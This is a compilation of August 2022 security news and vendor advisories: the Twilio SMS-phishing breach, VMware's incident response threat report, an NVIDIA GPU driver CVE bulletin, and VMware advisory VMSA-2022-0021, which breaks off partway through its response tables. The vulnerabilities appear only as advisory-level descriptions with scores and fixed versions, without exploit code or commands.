Customer engagement platform Twilio on Monday disclosed that a "sophisticated" threat actor gained "unauthorized access" using an SMS-based phishing campaign aimed at its staff to gain information on a "limited number" of accounts.
The social-engineering attack was bent on stealing employee credentials, the company said, calling the as-yet-unidentified adversary "well-organized" and "methodical

Customer engagement platform Twilio on Monday disclosed that a "sophisticated" threat actor gained "unauthorized access" using an SMS-based phishing campaign aimed at its staff to gain information on a "limited number" of accounts.

The social-engineering attack was bent on stealing employee credentials, the company said, calling the as-yet-unidentified adversary "well-organized" and "methodical in their actions." The incident came to light on August 4.

"This broad based attack against our employee base succeeded in fooling some employees into providing their credentials," it said in a notice. "The attackers then used the stolen credentials to gain access to some of our internal systems, where they were able to access certain customer data."

The communications giant has 268,000 active customer accounts, and counts companies like Airbnb, Box, Dell, DoorDash, eBay, Glassdoor, Lyft, Salesforce, Stripe, Twitter, Uber, VMware, Yelp, and Zendesk among its clients. It also owns the popular two-factor authentication (2FA) service Authy.

Twilio, which is still continuing its investigation into the hack, noted it's working directly with customers who were impacted. It didn't disclose the scale of the attack, the number of employee accounts that were compromised, or what types of data may have been accessed.

Phishing schemes, both leveraging email and SMS, are known to lean on aggressive scare tactics to coerce victims into handing over their sensitive information. This is no exception.

The SMS messages are said to have been sent to both current and former employees masquerading as coming from its IT department, luring them with password expiry notifications to click on malicious links.

The URLs included words such as "Twilio," "Okta," and "SSO" (short for single sign-on) to increase the chance of success and redirected the victims to a phony website that impersonated the company's sign-in page. It's not immediately clear if the breached accounts were secured by 2FA protections.

Twilio said the messages originated from U.S. carrier networks and that it worked with the telecom service and hosting providers to shut down the scheme and the attack infrastructure used in the campaign. The takedown efforts, however, have been offset by the attackers migrating to other carriers and hosting providers.

"Additionally, the threat actors seemed to have sophisticated abilities to match employee names from sources with their phone numbers," it noted.

The San Francisco-based firm has since revoked access to the compromised employee accounts to mitigate the attack, adding it's examining additional technical safeguards as a preventive measure.

The disclosure arrives as spear-phishing continues to be a major threat faced by enterprises. Last month, it emerged that the $620 million Axie Infinity hack was the consequence of one of its former employees getting tricked by a fraudulent job offer on LinkedIn.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Twilio Suffers Data Breach After Employees Fall Victim to SMS Phishing Attack

A rising tide of threats — from API exploits to deepfakes to extortionary ransomware attacks — is threatening to overwhelm IT security teams.

The use of deepfakes to evade security controls and compromise organizations is on the rise among cybercriminals, with researchers seeing a 13% increase in the use of deepfakes compared with last year.  

That's according to VMware's eighth annual "Global Incident Response Threat Report," which says that email is usually the top delivery method.

The study, which surveyed 125 cybersecurity and incident response (IR) professionals from around the world, also reveals an uptick in overall cybersecurity attacks since Russia's invasion of Ukraine; extortionary ransomware attacks including double extortion techniques, data auctions, and blackmail; and attacks on APIs.

"Attackers view IT as the golden ticket into an organization's network, but unfortunately, it is just the start of their campaign," explains Rick McElroy, principal cybersecurity strategist at VMware. "The SolarWinds attack gave threat actors looking to target vendors a step-by-step manual of how to successfully pull off an attack."

He says that keeping this in mind, IT and security teams need to work hand in hand to ensure all access points are secure to prevent an attack like that from harming their own organization.

McElroy explains what he found eye-opening was the increase in lateral movement witnessed by most respondents — i.e., the process by which attackers pivot from a compromised device to burrowing deeper into the corporate network.

He calls lateral movement "the new battleground," appearing in a quarter of all attacks, with attackers leveraging everything from script hosts and file storage (e.g., in the cloud) to PowerShell, business communications platforms, .NET, and numerous other dual-purpose tools to rummage around inside networks.

To account for the threat, organizations must consider solutions that provide visibility into all areas of the network, including the cloud, to ensure they can prevent, detect, and respond to attacks leveraging lateral movement.

"While lateral movement has always been a threat, we have seen an increasing percentage of east-west traffic not moving through the network," McElroy says. "In this situation, most security teams struggle unless their system and organization controls are equipped to see the lateral movement between workloads and containers on the hypervisor."

**Attackers Targeting APIs with Greater Frequency**

The report separately shows that API attacks are being seen by nearly a quarter (23%) of the respondents.

The most common types of API attacks include data exposure (experienced by 42% of respondents), SQL attacks (37%), API injection attacks (34%), and distributed denial-of-service (DDoS) attacks, experienced by a third of respondents.

McElroy says that while it can be difficult to determine a definitive number, if one looks broadly at threat reports from the last three years, API attacks are "definitely increasing."

"Given that APIs underpin technology stacks and ensure things like integrations, automations and orchestrations, the attackers understand the weaknesses in APIs and have been targeting them more frequently as a result," he says.

**Risk of Burnout Still High, but Falling**

Nearly half (47%) of survey respondents have experienced "burnout or extreme stress" in the past 12 months; however, this is down slightly from the 51% reported last year.

However, a higher percentage of those who have experienced burnout say they're more likely to consider leaving their job than those in the same group from the 2021 report.

Although battling something as big as employee burnout may seem daunting, there are practical steps security teams can take to streamline and ease user stress when it comes to security.

The report, for instance, indicates measures such as flexible hours, investment in further education, and days off for well-being were having a positive effect preventing burnout.

McElroy explains that along with smart steps to address employee wellness, dealing with the tsunami of threats is getting a little easier.

"Defenders have also already begun implementing new strategies and methods to stem the tide of incursions," he says.

The report says that 75% of organizations have employed virtual patching as an emergency mechanism, nearly 90% of respondents now say they are able to disrupt an adversary’s activities, and 74% report that IR engagements are resolved in a day or less.

"These are all signs that reflect the growing maturity of security teams," McElroy says.

Deepfakes Grow in Sophistication, Cyberattacks Rise Following Ukraine War

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it can dereference a null pointer, which may lead to denial of service.

**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**NVIDIA GPU Display Driver**

**CVE IDs**

**Description**

**Base Score**

**Vector**

CVE‑2022‑31606

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a failure to properly validate data might allow an attacker with basic user capabilities to cause an out-of-bounds access in kernel mode, which could lead to denial of service, information disclosure, escalation of privileges, or data tampering.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑31607

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where a local user with basic capabilities can cause improper input validation, which may lead to denial of service, escalation of privileges, data tampering, and limited information disclosure.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑31608

NVIDIA GPU Display Driver for Linux contains a vulnerability in an optional D-Bus configuration file,  
where a local user with basic capabilities can impact protected D-Bus endpoints, which may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑31610

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys),  
where a local user with basic capabilities can cause an out-of-bounds write, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑31617

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys),  
where a local user with basic capabilities can cause an out-of-bounds read, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑31612

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a local user with basic capabilities can cause an out-of-bounds read, which may lead to a system crash or a leak of internal kernel information.

7.1

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE‑2022‑31613

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer, where any local user can cause a null-pointer dereference, which may lead to a kernel panic.

7.1

AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE‑2022‑34665

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a local user with basic capabilities can cause a null-pointer dereference, which may lead to denial of service.

6.5

AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

CVE‑2022‑34666

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer,  
where a local user with basic capabilities can cause a null-pointer dereference, which may lead to denial of service.

6.5

AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

CVE‑2022‑31616

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a local user with basic capabilities can cause an out-of-bounds read, which may lead to denial of service, or information disclosure.

6.1

AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H

CVE‑2022‑31615

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where a local user with basic capabilities can cause a null-pointer dereference, which may lead to denial of service.

5.5

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

**NVIDIA vGPU Software**

**CVE IDs**

**Description**

**Base Score**

**Vector**

CVE‑2022‑31609

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it allows the guest VM to allocate resources for which the guest is not authorized. This vulnerability may lead to loss of data integrity and confidentiality, denial of service, or information disclosure.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑31614

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin) where it may double-free some resources. An attacker may exploit this vulnerability with other vulnerabilities to cause denial of service, code execution, and information disclosure.

7.0

AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑31618

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it can dereference a null pointer, which may lead to denial of service.

5.5

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates for NVIDIA GPU Display Driver****CVE IDs Addressed in Each Windows Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R515, R510, R470, R450

CVE‑2022‑31606, CVE‑2022‑31610, CVE‑2022‑31612, CVE‑2022‑31613, CVE‑2022‑31616, CVE‑2022‑31617, CVE‑2022‑34665, CVE‑2022‑34666

**Security Updates for NVIDIA GPU Windows Display Driver**

The following table lists the NVIDIA software products affected, Windows driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

GeForce

Windows

R515

All driver versions

Available the week of August 8, 2022

Windows 10 and 11

R470

All driver versions prior to 473.81

473.81

Windows 7 and 8._x_

R470

All driver versions prior to 473.81 for support of desktop Kepler-series GPUs

473.81

Studio

Windows

R515

All driver versions

Available the week of August 8, 2022

NVIDIA RTX/Quadro, NVS

Windows

R515

All driver versions prior to 516.94

516.94

R510

All driver versions prior to 513.46

513.46

R470

All driver versions prior to 473.81

473.81

Tesla

Windows

R515

All driver versions prior to 516.94

516.94

R510

All driver versions prior to 513.46

513.46

R470

All driver versions prior to 472.81

473.81

R450

All driver versions prior to 453.64

453.64

**CVE IDs Addressed in Each Linux Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux driver branch.

 

**Linux Driver Branch**

**CVE IDs Addressed**

R515, R510, R470, R450, R390

CVE‑2022‑31607, CVE‑2022‑31608, CVE‑2022‑31615

**Security Updates for NVIDIA GPU Linux Display Driver**

The following table lists the NVIDIA software products affected, Linux driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

GeForce

Linux

R515

All driver versions prior to 515.65.01

515.65.01

R510

All driver versions prior to 510.85.02

510.85.02

R470

All driver versions prior to 470.141.03

470.141.03

R390

All driver versions prior to 390.154

390.154

NVIDIA RTX, Quadro, NVS

Linux

R515

All driver versions prior to 515.65.01

515.65.01

R510

All driver versions prior to 510.85.02

510.85.02

R470

All driver versions prior to 470.141.03

470.141.03

R390

All driver versions prior to 390.154

390.154

Tesla

Linux

R515

All driver versions prior to 515.65.01

515.65.01

R510

All driver versions prior to 510.85.02

510.85.02

R470

All driver versions prior to 470.141.03

470.141.03

R450

All driver versions prior to 450.203.03

450.203.03

**Notes:**

*   Your computer hardware vendor may provide you with Windows GPU display driver versions including 516.54, 513.39, 473.70 and 453.64 which also contain the security updates.
*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, NVIDIA recommends upgrading to the latest branch release.

**Security Updates for NVIDIA vGPU Software**

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update. Log in to the NVIDIA Enterprise Application Hub to download updates from the NVIDIA Licensing Portal.

      

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

**vGPU Software**

**Driver**

**vGPU Software**

**Driver**

CVE‑2022‑31606  
CVE‑2022‑31610  
CVE‑2022‑31612  
CVE‑2022‑31613  
CVE‑2022‑31616  
CVE‑2022‑31617  
CVE‑2022‑34665  
CVE‑2022‑34666

vGPU software (guest driver)

Windows

All versions prior to and including 14.1

512.78

14.2

513.46

All versions prior to and including 13.3

473.47

13.4

473.81

All versions prior to and including 11.8

453.51

11.9

453.64

CVE‑2022‑34665  
CVE‑2022‑34666  
CVE‑2022‑31613

vGPU software (guest driver)

Linux

All versions prior to and including 14.1

510.73.08

14.2

510.85.02

All versions prior to and including 13.3

470.129.06

13.4

470.141.03

All versions prior to and including 11.8

450.191.01

11.9

450.203.02

CVE‑2022‑31609  
CVE‑2022‑31613  
CVE‑2022‑31614  
CVE‑2022‑34665  
CVE‑2022‑34666  
CVE‑2022‑31618

vGPU software (Virtual GPU Manager)

Citrix Hypervisor,  
VMware vSphere,  
Red Hat Enterprise Linux KVM

All versions prior to and including 14.1

510.73.06

14.2

510.85.03

All versions prior to and including 13.3

470.129.04

13.4

470.141.05

All versions prior to and including 11.8

450.191

11.9

450.203

**Notes:**

*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, NVIDIA recommends upgrading to the latest branch release.

**Security Updates for NVIDIA Cloud Gaming**

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update. 

      

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

**Cloud Gaming Software**

**Driver**

**Cloud Gaming Software**

**Driver**

CVE‑2022‑31606  
CVE‑2022‑31610  
CVE‑2022‑31612  
CVE‑2022‑31613  
CVE‑2022‑31616  
CVE‑2022‑31617  
CVE‑2022‑34665  
CVE‑2022‑34666

NVIDIA Cloud Gaming (guest driver)

Windows

All versions

Available the week of August 8, 2022

CVE‑2022‑31607  
CVE‑2022‑31613  
CVE‑2022‑34665  
CVE‑2022‑34666

NVIDIA Cloud Gaming (guest driver)

Linux

All versions

Available the week of August 8, 2022

CVE‑2022‑31607  
CVE‑2022‑31609  
CVE‑2022‑31613  
CVE‑2022‑31614  
CVE‑2022‑34665  
CVE‑2022‑34666

NVIDIA Cloud Gaming(Virtual GPU Manager)

Citrix Hypervisor,  
Red Hat Enterprise Linux KVM

All versions

Available the week of August 8, 2022

**Acknowledgements**

NVIDIA thanks the following people for reporting the issues to us:

*   CVE‑2022‑31606, CVE‑2022‑31612, CVE‑2022‑31616, and CVE‑2022‑31617 - Thierry Doré of Quarkslab
*   CVE‑2022‑31607 - Le Wu of Baidu Security
*   CVE‑2022‑31608 - Artem S. Tashkinov
*   CVE‑2022‑31615 - Tal Lossos

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins 
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

August 2, 2022

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Frequently Asked Questions (FAQs)**

How do I determine which NVIDIA display driver version is currently installed on my PC?

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2022-31618: Security Bulletin: NVIDIA GPU Display Driver - August 2022

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.

Advisory ID: VMSA-2022-0021.1

CVSSv3 Range: 4.7-9.8

Issue Date: 2022-08-02

Updated On: 2022-08-09

CVE(s): CVE-2022-31656, CVE-2022-31657, CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31662, CVE-2022-31663, CVE-2022-31664, CVE-2022-31665

Synopsis: VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.

Share this page on social media

Sign up for Security Advisories

****1\. Impacted Products****

*   VMware Workspace ONE Access (Access)
*   VMware Workspace ONE Access Connector (Access Connector)
*   VMware Identity Manager (vIDM)
*   VMware Identity Manager Connector (vIDM Connector)
*   VMware vRealize Automation (vRA)
*   VMware Cloud Foundation
*   vRealize Suite Lifecycle Manager

****2\. Introduction****

Multiple vulnerabilities were privately reported to VMware. Patches are available to remediate these vulnerabilities in affected VMware products.

****3a. Authentication Bypass Vulnerability (CVE-2022-31656)****

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

To remediate CVE-2022-31656, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

Workarounds for CVE-2022-31656 have been documented in the VMware Knowledge Base articles listed in the 'Workarounds' column of the 'Response Matrix' below.

VMware has confirmed malicious code that can exploit CVE-2022-31656 in impacted products is publicly available.

VMware would like to thank PetrusViet (a member of VNG Security) for reporting this issue to us.

****3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658)****

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0.

A malicious actor with administrator and network access can trigger a remote code execution. 

To remediate CVE-2022-31658, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank PetrusViet (a member of VNG Security) for reporting this issue to us.

****3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659)****

VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0.

A malicious actor with administrator and network access can trigger a remote code execution. 

To remediate CVE-2022-31659, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware has confirmed malicious code that can exploit CVE-2022-31659 in impacted products is publicly available.

VMware would like to thank PetrusViet (a member of VNG Security) for reporting this issue to us.

****3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661)****

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8.

A malicious actor with local access can escalate privileges to 'root'. 

To remediate CVE-2022-31660 and CVE-2022-31661 apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Spencer McIntyre of Rapid7 for reporting these issues to us.

****3e. Local Privilege Escalation Vulnerability (CVE-2022-31664)****

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8.

A malicious actor with local access can escalate privileges to 'root'. 

To remediate CVE-2022-31664, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Steven Seeley (mr\_me) of Qihoo 360 Vulnerability Research Institute for reporting this issue to us.

****3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665)****

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6.

A malicious actor with administrator and network access can trigger a remote code execution. 

To remediate CVE-2022-31665, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Steven Seeley (mr\_me) of Qihoo 360 Vulnerability Research Institute for reporting this issue to us.

****3g. URL Injection Vulnerability (CVE-2022-31657)****

VMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9.

A malicious actor with network access may be able to redirect an authenticated user to an arbitrary domain.

To remediate CVE-2022-31657, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Tom Tervoort of Secura for reporting this issue to us.

****3h. Path traversal vulnerability (CVE-2022-31662)****

VMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.

A malicious actor with network access may be able to access arbitrary files. 

To remediate CVE-2022-31662, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank PetrusViet (a member of VNG Security) for reporting this issue to us.

****3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663)****

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.

Due to improper user input sanitization, a malicious actor with some user interaction may be able to inject javascript code in the target user's window.

To remediate CVE-2022-31663, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank PetrusViet (a member of VNG Security) for reporting this issue to us.

**Response Matrix - Access 21.08.x**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31656

9.8

critical

KB89096

KB89084

FAQ

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31658

8.0

important

KB89096

None

FAQ

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31659

8.0

important

KB89096

None

FAQ

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31660, CVE-2022-31661

7.8

important

KB89096

None

FAQ

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31664

7.8

important

KB89096

None

FAQ

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31665

7.6

important

KB89096

None

FAQ

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31657

5.9

moderate

KB89096

None

FAQ

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31662

5.3

moderate

KB89096

None

FAQ

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31663

4.7

moderate

KB89096

None

FAQ

**Response Matrix - Identity Manager 3.3.x**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31656

9.8

critical

KB89096

KB89084

FAQ

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31658

8.0

important

KB89096

None

FAQ

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31659

8.0

important

KB89096

None

FAQ

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31660, CVE-2022-31661

7.8

important

KB89096

None

FAQ

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31664

7.8

important

KB89096

None

FAQ

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31665

7.6

important

KB89096

None

FAQ

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31657

5.9

moderate

KB89096

None

FAQ

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31662

5.3

moderate

KB89096

None

FAQ

vIDM

3.3.6, 3.3.5, 3.3.4

Linux

CVE-2022-31663

4.7

moderate

KB89096

None

FAQ

**Response Matrix - Connectors**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Access Connector

22.05

Windows

CVE-2022-31656, CVE-2022-31657, CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31662, CVE-2022-31663, CVE-2022-31664, CVE-2022-31665

N/A

N/A

Unaffected

N/A

N/A

Access Connector

21.08.0.1, 21.08.0.0

Windows

CVE-2022-31656, CVE-2022-31657, CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31662, CVE-2022-31663, CVE-2022-31664, CVE-2022-31665

N/A

N/A

Unaffected

N/A

N/A

vIDM Connector

3.3.6, 3.3.5, 3.3.4

Windows

CVE-2022-31662

5.3

moderate

KB89096

None

FAQ

vIDM Connector

3.3.6, 3.3.5, 3.3.4

Windows

CVE-2022-31656, CVE-2022-31657, CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31663, CVE-2022-31664, CVE-2022-31665

N/A

N/A

Unaffected

N/A

N/A

vIDM Connector

19.03.0.1

Windows

CVE-2022-31662

5.3

moderate

KB89096

None

FAQ

vIDM Connector

19.03.0.1

Windows

CVE-2022-31656, CVE-2022-31657, CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31663, CVE-2022-31664, CVE-2022-31665

N/A

N/A

Unaffected

N/A

N/A

**Response Matrix - vRealize Automation (vIDM)**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

vRealize Automation \[1\]

8.x

Linux

CVE-2022-31656, CVE-2022-31657, CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31662, CVE-2022-31663, CVE-2022-31664, CVE-2022-31665

N/A

N/A

Unaffected

N/A

N/A

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31656

9.8

critical

KB89096

KB89084

FAQ

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31658

8.0

important

KB89096

None

FAQ

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31659

8.0

important

KB89096

None

FAQ

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31660, CVE-2022-31661

7.8

important

KB89096

None

FAQ

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31664

7.8

important

KB89096

None

FAQ

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31665

7.6

important

KB89096

None

FAQ

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31657

5.9

moderate

KB89096

None

FAQ

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31662

5.3

moderate

KB89096

None

FAQ

vRealize Automation (vIDM) \[2\]

7.6

Linux

CVE-2022-31663

4.7

moderate

KB89096

None

FAQ

\[1\] vRealize Automation 8.x is unaffected since it does not use embedded vIDM. If vIDM has been deployed with vRA 8.x, fixes should be applied directly to vIDM.  
\[2\] vRealize Automation 7.6 is affected since it uses embedded vIDM.

**Impacted Product Suites that Deploy vIDM**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

VMware Cloud Foundation (vIDM)

4.4.x, 4.3.x, 4.2.x

Any

CVE-2022-31656

9.8

critical

KB89096

KB89084

FAQ

VMware Cloud Foundation (vIDM)

4.4.x, 4.3.x, 4.2.x

Any

CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31664, CVE-2022-31665, CVE-2022-31657, CVE-2022-31662, CVE-2022-31663

8.0, 8.0, 7.8, 7.8, 7.8, 7.6, 5.9, 5.3, 4.7

important

KB89096

None

FAQ

vRealize Suite Lifecycle Manager (vIDM)

8.x

Any

CVE-2022-31656

9.8

critical

KB89096

KB89084

FAQ

vRealize Suite Lifecycle Manager (vIDM)

8.x

Any

CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31664, CVE-2022-31665, CVE-2022-31657, CVE-2022-31662, CVE-2022-31663

8.0, 8.0, 7.8, 7.8, 7.8, 7.6, 5.9, 5.3, 4.7

important

KB89096

None

FAQ

**Impacted Product Suites that Deploy vRA**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

